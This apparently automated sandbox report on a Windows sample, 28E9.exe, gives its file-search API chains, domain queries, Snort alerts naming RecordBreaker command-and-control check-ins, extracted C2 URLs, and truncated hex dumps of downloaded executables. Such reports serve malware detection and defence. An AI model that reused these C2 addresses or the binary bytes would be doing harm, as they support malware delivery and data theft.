                    Source: C:\Users\user\AppData\Local\Temp\28E9.exeCode function: 20_2_004039D7 LocalAlloc,FindFirstFileW,lstrcmpW,LocalAlloc,PathCombineW,LocalAlloc,CopyFileW,CreateFileW,GetFileSize,LocalAlloc,StrCpyW,WideCharToMultiByte,LocalAlloc,LocalAlloc,WideCharToMultiByte,StrCpyW,LocalFree,LocalFree,LocalFree,LocalFree,FindNextFileW,FindClose,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,DeleteFileW,
                    Source: C:\Users\user\AppData\Local\Temp\28E9.exeCode function: 20_2_00406725 LocalAlloc,StrCpyW,StrCpyW,FindFirstFileW,LocalAlloc,PathCombineW,lstrcmpW,LocalAlloc,LocalAlloc,LocalAlloc,StrCpyW,StrCpyW,StrCpyW,LocalAlloc,LocalAlloc,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,LocalAlloc,LocalAlloc,StrCpyW,LocalAlloc,WideCharToMultiByte,WideCharToMultiByte,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,FindNextFileW,FindClose,LocalFree,
                    Source: C:\Users\user\AppData\Local\Temp\28E9.exeCode function: 20_2_0043A390 FindFirstFileW,
                    Source: C:\Users\user\AppData\Local\Temp\28E9.exeCode function: 20_2_0043A448 FindFirstFileW,

                    Networking

                    barindex
                    Source: C:\Windows\explorer.exeDomain query: cucumbetuturel4.com
                    Source: C:\Windows\explorer.exeDomain query: susuerulianita1.net
                    Source: C:\Windows\explorer.exeDomain query: linislominyt11.at
                    Source: C:\Windows\explorer.exeDomain query: moroitomo4.net
                    Source: C:\Windows\explorer.exeDomain query: monsutiur4.com
                    Source: C:\Windows\explorer.exeDomain query: nusurionuy5ff.at
                    Source: C:\Windows\explorer.exeDomain query: nunuslushau.com
                    Source: TrafficSnort IDS: 2036934 ET TROJAN Win32/RecordBreaker CnC Checkin 192.168.2.3:49759 -> 45.138.74.104:80
                    Source: TrafficSnort IDS: 2036955 ET TROJAN Win32/RecordBreaker CnC Checkin - Server Response 45.138.74.104:80 -> 192.168.2.3:49759
                    Source: Malware configuration extractorURLs: http://acacaca.org/lancer/get.php
                    Source: Malware configuration extractorURLs: http://susuerulianita1.net/
                    Source: Malware configuration extractorURLs: http://nikogminut88.at/
                    Source: Malware configuration extractorURLs: http://cucumbetuturel4.com/
                    Source: Malware configuration extractorURLs: http://lilisjjoer44.com/
                    Source: Malware configuration extractorURLs: http://mini55tunul.com/
                    Source: Malware configuration extractorURLs: http://limo00ruling.org/
                    Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
                    Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Thu, 11 Aug 2022 04:53:11 GMTContent-Type: application/octet-streamContent-Length: 2042296Connection: keep-aliveLast-Modified: Mon, 11 Apr 2022 14:39:48 GMTETag: "62543db4-1f29b8"Accept-Ranges: bytesData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f6 f1 39 62 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 e0 19 00 00 26 05 00 00 00 00 00 d0 01 15 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 60 1f 00 00 04 00 00 fd d1 1f 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 f8 21 1d 00 5c 9d 00 00 54 bf 1d 00 40 01 00 00 00 40 1e 00 78 03 00 00 00 00 00 00 00 00 00 00 00 0a 1f 00 b8 1f 00 00 00 50 1e 00 68 0a 01 00 68 fd 1c 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 f0 19 00 a0 00 00 00 00 00 00 00 00 00 00 00 f0 c4 1d 00 5c 04 00 00 94 21 1d 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 69 de 19 00 00 10 00 00 00 e0 19 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 e4 e9 03 00 00 f0 19 00 00 ea 03 00 00 e4 19 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 14 4e 00 00 00 e0 1d 00 00 2a 00 00 00 ce 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 30 1e 00 00 02 00 00 00 f8 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 40 1e 00 00 04 00 00 00 fa 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 68 0a 01 00 00 50 1e 00 00 0c 01 00 00 fe 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                    Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Thu, 11 Aug 2022 04:53:14 GMTContent-Type: application/octet-streamContent-Length: 449280Connection: keep-aliveLast-Modified: Mon, 11 Apr 2022 14:39:42 GMTETag: "62543dae-6db00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d9 93 31 43 9d f2 5f 10 9d f2 5f 10 9d f2 5f 10 29 6e b0 10 9f f2 5f 10 94 8a cc 10 8b f2 5f 10 9d f2 5e 10 22 f2 5f 10 cf 9a 5e 11 9e f2 5f 10 cf 9a 5c 11 95 f2 5f 10 cf 9a 5b 11 d3 f2 5f 10 cf 9a 5a 11 d1 f2 5f 10 cf 9a 5f 11 9c f2 5f 10 cf 9a a0 10 9c f2 5f 10 cf 9a 5d 11 9c f2 5f 10 52 69 63 68 9d f2 5f 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 9b 28 c1 5b 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 28 06 00 00 82 00 00 00 00 00 00 60 d9 03 00 00 10 00 00 00 40 06 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 f0 06 00 00 04 00 00 1f 84 07 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 10 67 04 00 82 cf 01 00 e8 72 06 00 18 01 00 00 00 a0 06 00 f0 03 00 00 00 00 00 00 00 00 00 00 00 9c 06 00 00 3f 00 00 00 b0 06 00 ac 3d 00 00 60 78 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 77 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 70 06 00 e4 02 00 00 c0 63 04 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 92 26 06 00 00 10 00 00 00 28 06 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 48 29 00 00 00 40 06 00 00 18 00 00 00 2c 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 ac 13 00 00 00 70 06 00 00 14 00 00 00 44 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 69 64 61 74 00 00 34 00 00 00 00 90 06 00 00 02 00 00 00 58 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 f0 03 00 00 00 a0 06 00 00 04 00 00 00 5a 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 ac 3d 00 00 00 b0 06 00 00 3e 00 00 00 5e 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
                    Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Thu, 11 Aug 2022 04:53:15 GMTContent-Type: application/octet-streamContent-Length: 80128Connection: keep-aliveLast-Modified: Sat, 28 May 2022 16:52:46 GMTETag: "6292535e-13900"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 c5 e4 d5 84 a4 8a 86 84 a4 8a 86 84 a4 8a 86 30 38 65 86 86 a4 8a 86 8d dc 19 86 8f a4 8a 86 84 a4 8b 86 ac a4 8a 86 d6 cc 89 87 97 a4 8a 86 d6 cc 8e 87 90 a4 8a 86 d6 cc 8f 87 9f a4 8a 86 d6 cc 8a 87 85 a4 8a 86 d6 cc 75 86 85 a4 8a 86 d6 cc 88 87 85 a4 8a 86 52 69 63 68 84 a4 8a 86 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 95 28 c1 5b 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 de 00 00 00 1c 00 00 00 00 00 00 90 d9 00 00 00 10 00 00 00 f0 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 30 01 00 00 04 00 00 74 28 02 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e0 e3 00 00 14 09 00 00 b8 00 01 00 8c 00 00 00 00 10 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 fa 00 00 00 3f 00 00 00 20 01 00 10 0a 00 00 80 20 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 20 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 b4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 f4 dc 00 00 00 10 00 00 00 de 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 f4 05 00 00 00 f0 00 00 00 02 00 00 00 e2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 84 05 00 00 00 00 01 00 00 06 00 00 00 e4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 00 04 00 00 00 10 01 00 00 04 00 00 00 ea 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 10 0a 00 00 00 20 01 00 00 0c 00 00 00 ee 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                    Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Thu, 11 Aug 2022 04:53:16 GMTContent-Type: application/octet-streamContent-Length: 627128Connection: keep-aliveLast-Modified: Mon, 11 Apr 2022 14:39:36 GMTETag: "62543da8-991b8"Accept-Ranges: bytesData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 d4 f1 39 62 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 18 08 00 00 56 01 00 00 00 00 00 b0 2f 04 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 d0 09 00 00 04 00 00 ed ee 09 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 ad bc 08 00 63 51 00 00 10 0e 09 00 2c 01 00 00 00 70 09 00 b0 08 00 00 00 00 00 00 00 00 00 00 00 72 09 00 b8 1f 00 00 00 80 09 00 34 43 00 00 1c b0 08 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1c 57 08 00 18 00 00 00 68 30 08 00 a0 00 00 00 00 00 00 00 00 00 00 00 14 13 09 00 d8 03 00 00 90 b7 08 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 d1 16 08 00 00 10 00 00 00 18 08 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 9c ff 00 00 00 30 08 00 00 00 01 00 00 1c 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 b8 1c 00 00 00 30 09 00 00 04 00 00 00 1c 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 50 09 00 00 02 00 00 00 20 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 74 6c 73 00 00 00 00 15 00 00 00 00 60 09 00 00 02 00 00 00 22 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 b0 08 00 00 00 70 09 00 00 0a 00 00 00 24 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 34 43 00 00 00 80 09 00 00 44 00 00 00 2e 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
                    Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Thu, 11 Aug 2022 04:53:17 GMTContent-Type: application/octet-streamContent-Length: 684984Connection: keep-aliveLast-Modified: Mon, 11 Apr 2022 14:40:08 GMTETag: "62543dc8-a73b8"Accept-Ranges: bytesData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 26 f2 39 62 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 1a 08 00 00 36 02 00 00 00 00 00 b0 1f 08 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 e0 0a 00 00 04 00 00 e9 81 0a 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 34 2c 0a 00 53 00 00 00 87 2c 0a 00 c8 00 00 00 00 a0 0a 00 78 03 00 00 00 00 00 00 00 00 00 00 00 54 0a 00 b8 1f 00 00 00 b0 0a 00 38 24 00 00 84 26 0a 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 30 08 00 a0 00 00 00 00 00 00 00 00 00 00 00 94 2e 0a 00 44 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 d5 19 08 00 00 10 00 00 00 1a 08 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 c4 06 02 00 00 30 08 00 00 08 02 00 00 1e 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 3c 46 00 00 00 40 0a 00 00 02 00 00 00 26 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 90 0a 00 00 02 00 00 00 28 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 a0 0a 00 00 04 00 00 00 2a 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 38 24 00 00 00 b0 0a 00 00 26 00 00 00 2e 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
                    Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Thu, 11 Aug 2022 04:53:17 GMTContent-Type: application/octet-streamContent-Length: 254392Connection: keep-aliveLast-Modified: Mon, 11 Apr 2022 14:39:58 GMTETag: "62543dbe-3e1b8"Accept-Ranges: bytesData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 27 f2 39 62 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 cc 02 00 00 f2 00 00 00 00 00 00 80 ce 02 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 00 04 00 00 04 00 00 a1 de 04 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 74 76 03 00 53 01 00 00 c7 77 03 00 f0 00 00 00 00 b0 03 00 80 03 00 00 00 00 00 00 00 00 00 00 00 c2 03 00 b8 1f 00 00 00 c0 03 00 98 35 00 00 68 71 03 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 e0 02 00 a0 00 00 00 00 00 00 00 00 00 00 00 44 7b 03 00 8c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 56 ca 02 00 00 10 00 00 00 cc 02 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 04 ac 00 00 00 e0 02 00 00 ae 00 00 00 d0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 98 0b 00 00 00 90 03 00 00 08 00 00 00 7e 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 a0 03 00 00 02 00 00 00 86 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 80 03 00 00 00 b0 03 00 00 04 00 00 00 88 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 98 35 00 00 00 c0 03 00 00 36 00 00 00 8c 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
                    Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Thu, 11 Aug 2022 04:53:18 GMTContent-Type: application/octet-streamContent-Length: 1099223Connection: keep-aliveLast-Modified: Mon, 11 Apr 2022 12:28:56 GMTETag: "62541f08-10c5d7"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 12 00 22 a9 2c 62 00 76 0e 00 b2 13 00 00 e0 00 06 21 0b 01 02 19 00 0c 0b 00 00 fa 0c 00 00 0a 00 00 00 14 00 00 00 10 00 00 00 20 0b 00 00 00 e0 61 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 10 0f 00 00 06 00 00 c8 9d 11 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 b0 0c 00 6e 2a 00 00 00 e0 0c 00 d0 0c 00 00 00 10 0d 00 a8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 0d 00 e0 3b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 00 0d 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c e2 0c 00 d0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 ac 0a 0b 00 00 10 00 00 00 0c 0b 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 50 60 2e 64 61 74 61 00 00 00 7c 27 00 00 00 20 0b 00 00 28 00 00 00 12 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 c0 2e 